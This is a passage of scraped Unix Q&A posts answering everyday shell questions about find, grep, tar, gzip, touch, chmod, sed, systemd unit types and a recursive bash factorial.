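# Write a two-line domain list and load it into an array, one element per line.
tmp=$(mktemp -d)
printf 'example.com\nexample.org\n' > "$tmp/domainlist"

mapfile -t domains < "$tmp/domainlist"

echo "${#domains[@]}"    # 2
echo "${domains[0]}"     # example.com
```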
| Curl against list domains from a file not working |
1,425,972,805,000 |
I want to recursively crawl a directory and if the file has \x58\x46\x53\x00 as the first 4 bytes, I want to run strings on the file.
|
Meth-1:
h_signature=$(echo 58465300 | tr 'a-f' 'A-F')
read -r x a b x <<<$(od --endian=big -N 4 -t x2 yourfile | tr 'a-f' 'A-F')
case "$a$b" in "$h_signature" ) strings yourfile ;; esac
Meth-2:
dd if=yourfile count=4 bs=1 2>/dev/null |
perl -lpe '$_ = uc unpack "H*"' | xargs test "$h_signature" = && strings yourfile
Meth-3:
head -c 4 yourfile | xxd -ps -g 4 | grep -qwi "$h_signature" && strings yourfile
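The one-liners above test a single file; since the question asks for a recursive crawl, here is a hedged sketch wrapping the check in find (od is used instead of xxd for portability; strings from binutils is assumed to be installed):

```shell
# Scratch tree: one file with the XFS magic, one plain text file.
tmp=$(mktemp -d)
cd "$tmp"
mkdir -p sub
printf '\130\106\123\0hello world' > sub/match.bin   # \x58\x46\x53\x00...
printf 'plain text file'           > other.txt

# Recursively check the first 4 bytes of every regular file and run
# strings only on the files whose signature matches.
find . -type f -exec sh -c '
  for f; do
    sig=$(od -An -N4 -tx1 "$f" | tr -d " \n")
    if [ "$sig" = "58465300" ]; then strings "$f"; fi
  done
' findsh {} +
# hello world
```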
| If file data starts with a certain hex sequence, run strings command on the file |
1,425,972,805,000 |
I have a filestructure with several subfolders where I'd like to search for all subfolder containing a certain string ("sub*") and then move all of the files in these found folders up one level from each of their respective location. And even potentially delete the then empty folder but I could do that with a second step as well.
|
This should do it:
find /path/to/base/folder/ -type d -name 'sub*' -exec bash -c 'mv {}/* "$(dirname {})"' \;
NOTE: this will not move hidden files (whose name start with .)
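A variant that also survives spaces and other special characters in directory names, passing each found directory as a positional argument instead of substituting {} into the command string (a sketch, with invented paths):

```shell
tmp=$(mktemp -d)
cd "$tmp"
mkdir -p 'parent dir/sub folder'
touch 'parent dir/sub folder/file 1.txt'

# Each found directory arrives as a quoted positional parameter "$d".
find . -type d -name 'sub*' -exec sh -c '
  for d; do mv "$d"/* "$(dirname "$d")"/; done
' movesh {} +

ls 'parent dir'    # "file 1.txt" now sits next to the emptied "sub folder"
```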
| Move Files from Directory up one level |
1,425,972,805,000 |
A previous answer to a post mentions to run sha1 hashes on an images of a dd drive clone image.
Another answer to that post suggests mounting the dd image an then compare if the sha1 hashes of "important files" matches.
I want to use the second approach, but instead of manually selecting files I would like to use a bunch of randomly selected files.
Assuming I have two mounted partitions, can I select a bunch of random files and compare the sha1 hashes and stop with an error if a hash is not equal?
Output should be roughly similar to this, if all goes well:
OK: all 10000 randomly selected files have matching sha1 sums for partitions sda and sdb
Or the output should only be in case of an error and show the filename that has a different sha1 sum on both partitions.
Current code in progress:
#!/bin/bash
N=5
mydir="/home"
dirlisting=`find $mydir |sort -R |tail -$N`
for fname in $dirlisting
do
echo $fname
done
|
As I understand your question you want to find out whether N random files differ between two file system paths. Comparing the files should be faster than calculating checksums of both files. Here is how you can do it:
#!/bin/sh
list1=/tmp/list1
list2=/tmp/list2
shuflist=/tmp/shuflist
n=100000 # How many files to compare.
if test ! -d "$1" -o ! -d "$2"; then
echo "Usage: $0 path1 path2"
exit 1
fi
exitcode=0
(cd "$1" && find . -type f >"$list1") || exit 1
(cd "$2" && find . -type f >"$list2") || exit 1
if cmp -s "$list1" "$list2"; then
shuf -n "$n" "$list1" > "$shuflist"
while IFS= read -r filename; do
if ! cmp -s "$1/$filename" "$2/$filename"; then
echo "Files '$1/$filename' and '$2/$filename' differ."
exitcode=1
break
fi
done < "$shuflist"
else
echo File lists differ.
exitcode=1
fi
rm "$list1" "$list2" "$shuflist"
exit $exitcode
Beware that this script assumes that none of your file names contain a newline character.
| check two partitions by selecting random files and running sha1 hashes on two files of each partition |
1,425,972,805,000 |
I am replicating a server -> I want to delete all the files inside the folders and the subfolders, without deleting the directories themselves.
Example:
home\apps\Batches\hello.txt
home\apps\Batches\test\text.txt
Output:
home\apps\Batches\
home\apps\Batches\test\
Only the files should be deleted.
|
Using \ to separate directory name components is a windows thing.
I would do something like:
find . -type f -delete
Note: that command is highly dangerous; be sure you really want to run it, and make sure you're in the correct directory (as I tell find to start in ., the correct directory is the root of the subtree that should be emptied).
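A dry run on a scratch copy of the question's layout:

```shell
tmp=$(mktemp -d)
cd "$tmp"
mkdir -p Batches/test
touch Batches/hello.txt Batches/test/text.txt

# Delete regular files only; the directory structure survives.
find . -type f -delete

find . -type d    # . ./Batches ./Batches/test
```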
| Delete all the files in a folder and its subfolders without deleting the folder structure |
1,425,972,805,000 |
I am trying to find all the files in a directory structure which contain a specific word, but it is not working correctly.
For example: when run from the path /Institute/IITDhanbad/, the command
grep -rn "Programmer" *
giving result as
BTECH/CompScience.txt:22: Sudip is a Programmer
However, when run from the path /Institute/IITDhanbad/MTECH, the same command gives
CSP/Boys/Good/Electronics.txt:13: Sourav is a Programmer
The problem is, that the expected result when running the grep call in /Institute/IITDhanbad/ folder was to have both results, i.e.
BTECH/CompScience.txt:22: Sudip is a Programmer
MTECH/CSP/Boys/Good/Electronics.txt:13: Sourav is a Programmer
What is going wrong and how to resolve this?
Some additional info:
The file type and access permissions are:
File
Mode
MTECH
drwxrwsr-x
BTECH
drwxrwsr-x
CSP
lrwxrwxrwx
ls -ld in /Institute/IITDhanbad/ path:
drwxrwsr-x 4 suresh faculty 4096 Sep 16 00:53
ls -ld in /Institute/IITDhanbad/MTECH path:
drwxrwsr-x 4 suresh faculty 4096 Sep 16 00:53
ls -ld in /Institute/IITDhanbad/MTECH/CSP path:
dr-xr-sr-t 4 ganesh faculty 4096 Sep 12 20:58 .
|
CSP is a symlink (see l in lrwxrwxrwx). Apparently your grep does not follow symlinks with -r, except symlinks provided as arguments. When you do:
grep -rn "Programmer" *
in the parent directory of CSP (i.e. in /Institute/IITDhanbad/MTECH/, right?), CSP appears as an argument after the shell expands *. But if you do this one directory "higher" (in /Institute/IITDhanbad/) then CSP is not an argument, it's a symlink encountered by grep during its recursive scanning.
GNU grep works this way. Is your grep GNU grep? If so, see the manual for -R. -R is like -r but it does follow symlinks.
Note if you did grep -rn "Programmer" . in the parent directory of CSP then CSP would not appear as an argument. The usage of * was crucial for what you observed.
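A minimal reproduction with GNU grep (directory names invented; the content to search lives outside the searched tree so it is only reachable through the symlink):

```shell
tmp=$(mktemp -d)
mkdir -p "$tmp/outside/Good" "$tmp/tree/MTECH"
printf 'Sourav is a Programmer\n' > "$tmp/outside/Good/Electronics.txt"
ln -s ../../outside "$tmp/tree/MTECH/CSP"
cd "$tmp/tree"

grep -rl Programmer .   # no output: -r skips symlinks met during traversal
grep -Rl Programmer .   # ./MTECH/CSP/Good/Electronics.txt
```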
| "grep -rn" only yields one of two expected results |
1,425,972,805,000 |
I'm using Bash on Ubuntu on Windows to run linux commands on my windows system. It seems to work just like Ubuntu so for all intents and purposes I'm on ubuntu here I guess.
I'm trying to use strings to dump all the strings across a bunch of files in a directory/its subdirectories to a single file.
I'm using this thread as a guide
Only problem is my results will typically generate outputs that are tens of gigabytes in size (before I kill the program) that seem to come from infinite loops of copying the same files over and over again.
This is what I've tried:
> strings -e S ./* > all.bin.jp.txt
> strings -e S ./** > all.bin.jp.txt
> find . -type f -exec strings -e S {} \; >> all.jp.txt
> find ./* -type f -exec strings -e S {} \; >> all.jp.txt
> find . -type f -exec strings -e S {} \; > all.jp.txt
> for file in ./*; do strings -e S "$file" >> all.bin.txt; done
> for file in ./**; do strings -e S "$file" >> all.bin.txt; done
> for file in ./*/*; do strings -e S "$file" >> all.bin.txt; done
I don't remember which command did it but I think the last one actually finished and gave me a file that was a few gigabytes, even though it opened easily in Notepad++. But I noticed that like 70% of that file was the same line repeated over and over again.
I've run these commands INSIDE the directory I want to get all the files, and all the files from the subdirectories, from. E.g.,
Parent Directory
--Directory of Interest
---file1
---file2
---subdirectory1
------fileA1
------fileA2
---subdirectory2
------fileB1
So from Parent Directory I type cd Directory of Interest, and then I run the command, and I want everything from file1, file2, fileA1, fileA2, and fileB1 to be dumped to a single file also inside Directory of Interest, at the same level as file1 and file2.
I'm also confused about what level to execute the command at. I don't actually care where I execute the command or if the file gets placed e.g. directly inside Parent Directory - this is just what I've tried. I don't usually have trouble running strings on all files in the current directory, using commands like the below inside the directory with all the files of interest but this subdirectories thing has me stumped.
strings -e S . > all.bin.jp.txt
strings -e S *.bin > all.bin.jp.txt
Please help me! I remember this used to work when I tried it before, but I don't remember the exact command I used. I've tried it on a couple different directories with the same types of files I've used this command on before, but it won't work for any of them, so I don't know what's wrong.
|
The find command works fine, you only need to exclude all.jp.txt from the list of files to be found or redirect the output to a different directory, i.e. not . or one of its sub-directories. Otherwise strings also runs on all.jp.txt and grows and grows.
find . -type f ! -path ./all.jp.txt -exec strings -e S {} \; > all.jp.txt
or
find . -type f -exec strings -e S {} \; > /some/other/dir/all.jp.txt
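The feedback loop can be reproduced harmlessly with cat standing in for strings — without the ! -path exclusion, the output file is re-read as its own input:

```shell
tmp=$(mktemp -d)
cd "$tmp"
printf 'alpha\n' > a.txt
printf 'beta\n'  > b.txt

# all.txt is created by the redirection before find starts,
# so it must be excluded from the search.
find . -type f ! -path ./all.txt -exec cat {} \; > all.txt

sort all.txt    # alpha and beta, each exactly once
```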
| Output file blows up when trying to find strings on bash on ubuntu on windows |
1,425,972,805,000 |
I wrote an executable that I want to execute on all the files contained in a directory.
This is what the program looks like:
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/xattr.h>
#include <string.h>
#include <errno.h>
int main(int argc, char const *argv[]){
char argNormaux[4096] = {0};
char argNeg[4096] = {0};
char argEt[4096] = {0};
int nbArgsNormaux = 0;
if (argc > 2){
for (int i = 2; i < argc; i++){
const char *arg = argv[i];
if (strstr(argv[i],"et") != NULL){
strcat(argEt, argv[i]);
}
else if (strstr(argv[i], "!") != NULL){
strcat(argNeg, argv[i]);
}
else {
strcat(argNormaux, argv[i]);
nbArgsNormaux++;
}
}
const char *path = argv[1];
char buf[4096];
int rc;
rc = listxattr(path, buf, sizeof(buf));
if (rc < 0){
perror("listxattr");
}
else {
if (strlen(buf) == 0){
printf("No tag.\n");
return 1;
}
int tagsNormauxCheck = 0;
int tagsNegCheck = 0;
char *token = buf;
while(*token){
char tagBuf[4096];
if (strlen(token) == 2){
if (strcmp(token, "\0\0\0")) break;
}
rc = getxattr(path, token, &tagBuf, sizeof(tagBuf));
if (rc < 0){
perror("getxattr");
}
else {
if (strstr(argNormaux, tagBuf) != NULL) {
tagsNormauxCheck++;
}
if (strstr(argNeg, tagBuf) != NULL) {
tagsNegCheck = 1;
break;
}
}
memset(&tagBuf, 0, sizeof(tagBuf));
token = strchr(token, '\0');
token++;
}
if (tagsNormauxCheck == nbArgsNormaux && tagsNegCheck == 0){
printf("Le fichier %s possède la combinaison des tags donnés.", path);
}
}
}
else {
printf("Pas assez d'arguments.");
}
return 0;
}
This is the command line I'm trying to use :
find . -type f -exec ./logic testDir/ essai '{}' \;
What I'm expecting is to have the logic executable applied to every file in testDir, but what it does is apply it directly to testDir once for each file in that dir, which is not what I want... I've been trying to make it work for days; logic works perfectly fine when applied to a single file. So I don't know what I should do to achieve what I want. The file argument on which logic is applied doesn't change with that command.
EDIT : Adding more context on what I want to achieve, the purpose of logic and how I want it to work.
logic is a program that shows whether a file has the combination of the extended-attribute tags passed to logic. One example of running logic alone is: logic testfile.txt programming class university \!art. So basically: tell me if testfile.txt has the combination of tags programming and class and university and not art.
Now let's say I have a directory such as :
testDir/
├── dir2
│ ├── dir2file1.txt
│ ├── dir2file2.txt
│ └── dir2file3.txt
├── file1.txt
├── file2.txt
├── file3.txt
└── file4.txt
1 directory, 7 files
I want logic to be executed on each file present in that directory tree. (folders excluded)
So basically, my problem here is that the file argument passed to logic when using find isn't changing. It will stay testDir/, but I'd like it to be testDir/file1.txt, then testDir/file2, until it reaches dir2file3.txt.
Anyway to make it work please?
Thanks.
|
It looks as if you want the file path to be the first argument to your program:
find testDir -type f -exec ./logic {} essai \;
This will search the directory testDir (as well as any subdirectory of testDir) for regular files, and for each found file, it will call your program with the pathname of the file as the first argument (and with essai as the second argument).
The difference between this and your own command,
find . -type f -exec ./logic testDir/ essai '{}' \;
is that
The pathname of the found file is passed as the last command line argument,
The first argument is always testDir/,
You search the current directory (and its subdirectories).
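The difference in argument order is easy to observe by substituting echo for the program (directory layout invented to mirror the question):

```shell
tmp=$(mktemp -d)
cd "$tmp"
mkdir -p testDir/dir2
touch testDir/file1.txt testDir/dir2/dir2file1.txt

# Each found file becomes the first argument, essai the second:
find testDir -type f -exec echo {} essai \;
```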
| How to execute recursively a program on every files contained in directory with find |
1,425,972,805,000 |
I want to run this:
grep -r zlib *.cpp
But this fails unless there is a .cpp file in the current directory (in which case only it is searched):
grep: *.cpp: No such file or directory
Now:
grep -r zlib *
Does search through the whole hierarchy but I want to limit the search to (eg) .cpp files.
Looked through man and a lot of recipe sites but cannot find an answer to what I assume is a simple query - so apologies in advance.
|
It has nothing to do with grep, but with your current shell. The shell expands *.cpp to all the cpp file names in your current directory before running the grep command. Since it can't find any filenames, the glob *.cpp is left unexpanded by the shell. grep then treats the literal *.cpp as a filename and complains that no such file exists.
You have couple of options, use find
find . -type f -name "*.cpp" -exec grep -H zlib {} +
or, if you are using a bash shell, set the nullglob option so that a glob matching nothing expands to nothing instead of being returned unexpanded. The (..) subshell makes the shell option temporary rather than persistent. Note that --include='*.cpp' must be quoted here: with nullglob set, an unquoted --include=*.cpp matching no file in the current directory would vanish entirely, and your command would become grep -r zlib . — a search of every file in the subtree below.
( shopt -s nullglob; grep -r --include='*.cpp' zlib . ; )
Another variant that doesn't include the --include option of grep but using the globstar that allows recursive glob expansion in sub-directories
( shopt -s nullglob globstar; grep -rH zlib **/*.cpp ; )
Remember the --include= and -H are GNU grep options and not POSIX compatible
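The difference nullglob makes can be seen with a tiny helper in an empty directory (bash assumed; the args function is just a stand-in for counting what the command would receive):

```shell
tmp=$(mktemp -d)
cd "$tmp"                          # empty directory, no .cpp files

args() { echo "$#"; }              # prints how many arguments it got

args *.cpp                         # 1 — the literal, unexpanded pattern
( shopt -s nullglob; args *.cpp )  # 0 — the failed glob expands to nothing
```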
| Grepping across multiple directories |
1,425,972,805,000 |
The program "zip" has a -R feature which allows one to zip all files with a certain name in a directory tree: zip -r v/s zip -R
For example:
zip -R bigfile "bigfile"
Will zip all of the following:
./bigfile
./a/bigfile
./a/b/bigfile
./a/b/c/bigfile
.......
The -R feature doesn't seem to be in gzip or xz though. I've tried it, and I've also checked the man pages.
So how may I emulate this behavior in gzip and xz?
|
Combining find, tar and the compression utilities:
With gzip:
find . -type f -name bigfile | tar cfz bigfile.tgz -T -
or with xz:
find . -type f -name bigfile | tar cfJ bigfile.txz -T -
find searches recursively for all files named bigfile under the current/working directory and the resulting pathnames are supplied to tar that creates a tarball and compresses it.
These commands are suited for the example supplied in the question. Different patterns supplied to zip -R will require corresponding arguments supplied to find.
Also keep in mind that this won't work for all possible filenames; you should consider the --null option and feed tar from find -print0.
Also tar's "-T" option is not available on every systems (for instance in HP-UX).
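For names containing whitespace, the -print0/--null pairing looks like this (GNU find and tar assumed; paths invented):

```shell
tmp=$(mktemp -d)
cd "$tmp"
mkdir -p 'a dir/b'
printf 'x\n' > 'a dir/bigfile'
printf 'y\n' > 'a dir/b/bigfile'
printf 'z\n' > notme

# NUL-delimited pathnames survive the pipe intact.
find . -type f -name bigfile -print0 | tar -czf bigfile.tgz --null -T -

tar -tzf bigfile.tgz    # lists the two bigfile paths, nothing else
```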
EDIT1
Unlike zip, rar or 7-zip, for example, gzip and xz are not capable of compressing multiple files into one.
Quoting the gzip manpage:
If you wish to create a single archive file with multiple members so that members can later be extracted independently, use an archiver such as tar or zip. GNU tar supports the -z option to invoke gzip transparently. gzip is designed as a complement to tar, not as a replacement.
See How to gzip multiple files into one gz file? and How do I compress multiple files into a .xz archive?.
EDIT2
If the goal of the OP is to make a gzip file for each file it finds that satisfies the search criteria the following command should be issued:
find . -type f -name bigfile -exec gzip -k {} +
For xz files:
find . -type f -name bigfile -exec xz -k {} +
It will create a compressed file next to each file that satisfies the search criteria, leaving the original files "untouched" (that is what the -k/--keep flag is for; note that piping the output of find into gzip would only compress the list of filenames, not the files themselves).
EDIT3
As suggested by @Kusalananda, if in bash you first do:
shopt -s globstar
and then issue the command:
tar -c -zf bigfile.tgz ./**/bigfile
a single archive file will be created with the multiple files found in subdirectories that satisfies the search criteria.
If the goal is to create one compressed file for each file found in subdirectories that satisfies the search criteria, after issuing the shopt command, you can just issue:
gzip ./**/bigfile
| How may I emulate the -R feature of "zip", but in gzip and xz? |
1,425,972,805,000 |
I have lots of tar(.tar.bz2) files containing multiple file types in a recursive directory.
I want to extract just one type of file (let's say .txt files) from all the directories. How do I do that?
I have this command to extract all the files in each directory:
for file in *.tar.bz2; do tar -jxf "${file}"; done
I want to extract only the ".txt" files instead of all.
|
Quoting the GNU tar manpage:
Thus, to extract files whose names end in `.c', you can use:
$ tar -xf foo.tar -v --wildcards '*.c'
So for you case, I'd go with:
for file in *.tar.bz2; do tar -jxf "${file}" --wildcards '*.txt'; done
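A round-trip check of the --wildcards extraction (GNU tar and bzip2 assumed; file names invented):

```shell
tmp=$(mktemp -d)
cd "$tmp"
mkdir src
printf 'text\n' > src/notes.txt
printf 'code\n' > src/main.c
tar -cjf archive.tar.bz2 -C src .

# Extract only the .txt members into a fresh directory.
mkdir out && cd out
tar -jxf ../archive.tar.bz2 --wildcards '*.txt'

ls    # notes.txt only
```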
| how to untar specific files recursively in linux? [duplicate] |
1,425,972,805,000 |
This question has parallels to question "touch all folders in a directory".
How to touch everything in a directory,
recursively
including hidden entries, like "directory up" .. and .
without de-referencing symbolic links touch -h and
use a reference file touch -r <file> as the the time stamp source
from within a shell-script?
|
If your touch command supports -h for no dereference:
find . -depth -exec touch -h -r "$reference_file" {} +
touch -c -h -r "$reference_file" ..
(note that with NetBSD/FreeBSD, -h implies -c, so the file is not created if it didn't exist; that's not the case with GNU or busybox touch — though GNU touch wouldn't create the file either, it would print an error message — so -c is added here for increased portability).
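A quick check with GNU coreutils that the symlink itself receives the reference timestamp (paths invented; GNU stat reports the link's own times without -L):

```shell
tmp=$(mktemp -d)
cd "$tmp"
touch -d '2001-02-03 04:05:06' reference_file
mkdir dir
ln -s /nonexistent dir/link     # a dangling symlink, deliberately

find dir -depth -exec touch -h -r reference_file {} +

stat -c %y dir/link    # same timestamp as reference_file
```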
Or with a single find command which could reduce the number of touch commands being run:
find .. . -depth \( ! -name .. -o -prune \) -exec touch -c -h -r "$reference_file" {} +
That is, add .. to the list of files given to find, but tell find to prune it (not descend into it).
For an arbitrary directory (well, one whose path doesn't start with -):
find "$dir/.." "$dir/" \( ! -name .. -o -prune \) \
-exec touch -c -h -r "$reference_file" {} +
(here using $dir/ instead of $dir for the case where $dir refers to a symlink to a directory).
With BSD find, you can use
find -f "$dir/.." -f "$dir/" \( ! -name .. -o -prune \) \
-exec touch -c -h -r "$reference_file" -- {} +
to avoid the problems with $dir starting with -.
Though you might as well do:
(
cd -P -- "$dir/" &&
exec find .. . \( ! -name .. -o -prune \) \
-exec touch -c -h -r "$reference_file" {} +
)
(assuming $reference_file is not a relative path).
Note that if $reference_file is a symlink, with GNU touch and with -h, the modification time of the symlink will be used (that of the target would be used without -h) while with NetBSD (where -h comes from) and FreeBSD touch, the modification time of the target is used with or without -h.
If using zsh, you could use its recursive globbing
autoload zargs
zargs -- $dir/{.,..,**/*(NDoN)} -- touch -c -h -r $reference_file --
(the oN for not sorting the list can be omitted, that's just for optimisation).
ksh93 eventually added support for zsh's recursive globbing in 2005, with the globstar option.
(set -o globstar; FIGNORE=
command -x touch -c -h -r "$reference_file" -- ~(N)"$dir"/**)
Note however that ksh will include all . and .. entries here so all directories will be touched several times.
bash eventually copied ksh93's globstar in 2009, but was initially /broken/ in that it was following symlinks when descending directories. It was fixed in 4.3 in 2014.
bash doesn't have the equivalent of zsh's zargs or ksh93's command -x to split command lines so as to avoid the arg list too long issues. On a GNU system, you could always use GNU xargs for that:
xargs -r0a <(
shopt -s dotglob nullglob globstar
printf '%s\0' "$dir/"{.,..,**}
) touch -c -h -r "$reference_file" --
Now, I would probably still use find here. Beside the poorer performance, another issue with globs is that errors (like access denied) when traversing the directory tree are silently ignored.
| How to touch everything in a directory including hidden, like directory up `..`? |
1,425,972,805,000 |
I want to execute a script on startup. The script is recursive and calls itself.
When I added systemd unit for the same, it is executing but getting stopped in 1 min due to DefaultTimeoutStartSec. It assumes that my script has not yet started.
Following is the service file I have created
[Unit]
Description = My Desc
After = network.target
[Service]
Type = forking
ExecStart = /root/my_recursive_script.sh
[Install]
WantedBy = multi-user.target
I know I can make this service as working by adding TimeoutSec to infinity but that would be workaround. When I execute my service with
systemctl start myservice.service
it does not leave the cursor until timeout encounter.
What is the proper way to make systemd units work with recursive script?
Do I need to make changes in my script to make it executable like daemon?
|
The issue is that you have set the service type to forking. Systemd is waiting for your ExecStart process to fork to the background before proceeding. You need to change the type to simple. See the manual
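With that one change, the unit from the question would look like this (everything else kept as posted):

```ini
[Unit]
Description = My Desc
After = network.target

[Service]
# simple: the started process IS the service; no forking expected.
Type = simple
ExecStart = /root/my_recursive_script.sh

[Install]
WantedBy = multi-user.target
```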
| Start Recursive Script as systemd unit |
1,425,972,805,000 |
There are about 50 HTML/js files in the folder name site,
some of the files contain (below lines are combined from files)
{"rendered":"http:\/\/localhost:4542\/?page_id=854"}
http:\/\/localhost:4542\/wp-content\/uploads\/2022\/09\/
src=\"http:\/\/localhost:4542\/wp-content\/uploads\/2022\/09\/B
http:\/\/localhost:4542\/wp-content\/uploads\/2022\/09\/A
replies":[{"embeddable":true,"href":"http:\/\/localhost:4542\/en\/wp-json
Any tool/ commands to replace http:\/\/localhost:4542 to https:example.com recursively in all files of a folder?
Working on a macOS now.
|
You can try using the command find with -exec argument:
find /path/to/folder -type f -regex '.*\.\(js\|html\)' -exec sed -i 's#http:\\/\\/localhost:4542#https:example.com#g' {} +
On macOS you can use a similar syntax (note that with BSD find, the -E option must come before the path):
find -E /path/to/folder -type f -regex '.*\.(js|html)' -exec sed -i '.bak' 's#http:\\/\\/localhost:4542#https:example.com#g' {} +
I really hope that works, I don't have a Mac to test it, but it should work.
On macOS, when you specify the -i option the backup file name extension is required. You can use any value instead of '.bak'
Credits:
How to use find command to search for multiple extensions,
sed command with -i option failing on Mac
Note: I'm not sure if this code will work in macOS, but you can try it too (the parentheses are needed so that -exec applies to both -iname tests, not just the second one):
find /path/to/folder \( -iname "*.html" -o -iname "*.js" \) -exec sed -i 's#http:\\/\\/localhost:4542#https:example.com#g' {} +
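The grouping of several -iname tests can be checked quickly on a scratch tree (GNU sed assumed; on macOS, sed -i needs a backup-extension argument; file names invented):

```shell
tmp=$(mktemp -d)
cd "$tmp"
printf '%s\n' 'http:\/\/localhost:4542' > page.html
printf '%s\n' 'http:\/\/localhost:4542' > app.js
printf '%s\n' 'http:\/\/localhost:4542' > notes.txt

# The parentheses make -exec apply to both extensions; notes.txt is skipped.
find . \( -iname '*.html' -o -iname '*.js' \) \
  -exec sed -i 's#http:\\/\\/localhost:4542#https:example.com#g' {} +

cat notes.txt    # untouched
```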
| How to replace all matched strings in the files recursively? |
1,425,972,805,000 |
I have a folder that has many subfolders in it. I want to list all the files in all the subfolders but I want the files sorted by subfolder name. I'm not interested in files in the current directory.
Currently I am using this command which gets me the correct filename & path output I desire, with the exception that it is not sorted by subfolder.
find -type f
ex data:
8585/file10.txt
8585/file83.txt
34032/file130.txt
10/file5400.txt
desired sorted output:
10/file5400.txt
8585/file83.txt
8585/file10.txt
34032/file130.txt
Thanks in advance for any help!
|
Pipe the data from find into sort. The default setting for sort is according to your locale, typically alphanumeric. If that's not giving you the sorting order you want, and you have GNU sort, try with the -V flag as in my example,
find -type f | sort -V
See man sort for the details
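A quick check of the natural-number ordering with the question's sample paths (GNU sort assumed for -V):

```shell
printf '%s\n' '8585/file10.txt' '8585/file83.txt' '34032/file130.txt' '10/file5400.txt' |
  sort -V
# 10/file5400.txt
# 8585/file10.txt
# 8585/file83.txt
# 34032/file130.txt
```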
| List all files in subdirectories sort by subdirectory name |
1,425,972,805,000 |
I have a large file structure with multiple nested folders. I would like to tar+gzip up every folder with a specific name and remove the original folder.
In this example the script I hope to have would detect every folder ending in .abc and tar+gzip that folder up, removing the original folder and leaving .gz.
Main Folder/
Project 1/
Prj1FolderA.abc/
...lots of tiny files and maybe subfolders...
Prj1FolderB.abc/
...lots of tiny files and maybe subfolders...
Prj1FolderC.abc/
...lots of tiny files and maybe subfolders...
Project 2/
Prj2FolderA.abc/
...lots of tiny files and maybe subfolders...
Prj2FolderB.abc/
...lots of tiny files and maybe subfolders...
Prj2FolderC.abc/
...lots of tiny files and maybe subfolders...
Project 3/
Prj3FolderA.abc/
...lots of tiny files and maybe subfolders...
Prj3FolderB.abc/
...lots of tiny files and maybe subfolders...
Prj3FolderC.abc/
...lots of tiny files and maybe subfolders...
Project 4/
Another Folder Inside/
Prj4FolderA.abc/
...lots of tiny files and maybe subfolders...
Prj4FolderB.abc/
...lots of tiny files and maybe subfolders...
Prj4FolderC.abc/
...lots of tiny files and maybe subfolders...
After running this script, I would like the folder to look like:
Main Folder/
Project 1/
Prj1FolderA.abc.tar.gz
Prj1FolderB.abc.tar.gz
Prj1FolderC.abc.tar.gz
Project 2/
Prj2FolderA.abc.tar.gz
Prj2FolderB.abc.tar.gz
Prj2FolderC.abc.tar.gz
Project 3/
Prj3FolderA.abc.tar.gz
Prj3FolderB.abc.tar.gz
Prj3FolderC.abc.tar.gz
Project 4/
Another Folder Inside/
Prj4FolderA.abc.tar.gz
Prj4FolderB.abc.tar.gz
Prj4FolderC.abc.tar.gz
This is just an example and the names of the folders may not be exactly as above, nor are they all exactly 2 levels deep. There could be multiple folders in between.
I'm assuming using find to do this, but I'm not quite sure how to pass the proper info into tar and delete the original folder. Thanks!
|
Run this in Main Folder:
find . -type d -name '*.abc' -exec sh -c '
for d; do tar -C "$d" -zcf "$d.tar.gz" . && rm -r "$d"; done
' findsh {} +
Although I tested it, I recommend you to test it too. Put an echo before rm, so if anything goes wrong you do not lose your data.
The inner loop executes tar and rm (only if tar was successful) for found child directories matching the '*.abc' glob pattern.
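A dry run on a disposable copy of the layout, with one tiny project (no echo guard, since the tree is throwaway):

```shell
tmp=$(mktemp -d)
cd "$tmp"
mkdir -p 'Project 1/Prj1FolderA.abc'
printf 'data\n' > 'Project 1/Prj1FolderA.abc/tiny.txt'

# Archive each *.abc directory in place, then remove the original.
find . -type d -name '*.abc' -exec sh -c '
  for d; do tar -C "$d" -zcf "$d.tar.gz" . && rm -r "$d"; done
' findsh {} +

ls 'Project 1'    # Prj1FolderA.abc.tar.gz
```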
| How do I recursively tar+gzip folders with a specific name? |
1,425,972,805,000 |
I grant the heading of this question is odd, but I do wonder if in some situations there is a need to take extra caution and somehow "enforce" non-recursiveness when changing permissions with chmod non-recursively (without the -R argument).
Say I have a directory ~/x. This dir has a few files, as well as a sub-dir ~/x/y that also has a few files, and I decided to make all x files executable without affecting files in y. I could execute:
chmod +x ~/x/*
Surely chmod should do the job, and it's unlikely that in any Bash version (including future versions) the POSIX logic would change so that the above chmod would affect the sub-dir's contents as well, but I do wonder if there could be any situations in Bash (or common shells) in which chmod +x ~/x/* would also cover the y files, and how to improve my command to protect against such an undesired change?
|
You can use find, restricting it to regular files in the top directory only:
find ~/x -maxdepth 1 -type f -exec chmod +x {} +
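A quick sanity check on a throwaway tree (paths hypothetical) shows that only regular files directly inside the directory are touched. Note that -type f also keeps chmod away from the subdirectory itself, which a plain chmod +x ~/x/* would have matched, since the glob expands to the directory name too.

```shell
# Build a small tree: one file at the top level, one inside a subdirectory.
mkdir -p /tmp/xdemo/y
touch /tmp/xdemo/top /tmp/xdemo/y/inner
# Only /tmp/xdemo/top gains +x; y and y/inner are left alone.
find /tmp/xdemo -maxdepth 1 -type f -exec chmod +x {} +
```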
| Make all files in a dir executable (non-recursively) while strictly-ensuring non-recursivness |
1,425,972,805,000 |
I need to delete recursive subfolders in a single line.
For one subfolder:
find folder -name "subfolder" -exec rm -r "{}" \;
or
find folder -name "subfolder" -type d -exec rm -r "{}" \;
But in the case of several subfolders in a single line? (subfolder1, subfolder2 or foo, bar, dummy…)
|
What I would do :
find folder -name "subfolder[0-9]*" -exec rm -r {} \;
using a glob
or
find folder \( -name 'foo' -o -name 'bar' -o -name 'dummy' \) -exec rm -r {} \;
| Delete recursive subfolders with find |
1,425,972,805,000 |
I'm new to shell, and UNIX / GNU/Linux.
I'm trying to understand this syntax that is part of a recursion function:
[ $i -le 2 ] && echo $i || { f=$(( i - 1)); f=$(factorial $f); f=$(( f * i )); echo $f; }
(taken from here)
the full related function is:
factorial(){
local i=$1
local f
declare -i i
declare -i f
[ $i -le 2 ] && echo $i || { f=$(( i - 1)); f=$(factorial $f); f=$(( f * i )); echo $f; }
}
I understand [ $i -le 2 ] means check if there are at least 2 positional arguments; I just don't understand what the double pipe symbol is (OR?). Also, what do the {} do? Are they kind of a 4-argument for loop?
Thanks,
David
|
First,
local i=$1
assigns the value of $1 to i. $1 is the first argument of the function. Or outside of a function, it stands for the first positional parameter of a command or script.
The following are quite intuitive. -i means the variable is an integer.
local f
declare -i i
declare -i f
Now to the long one. I'll break it down into separate lines for clarity.
[ $i -le 2 ] #checks if $i is less or equal 2
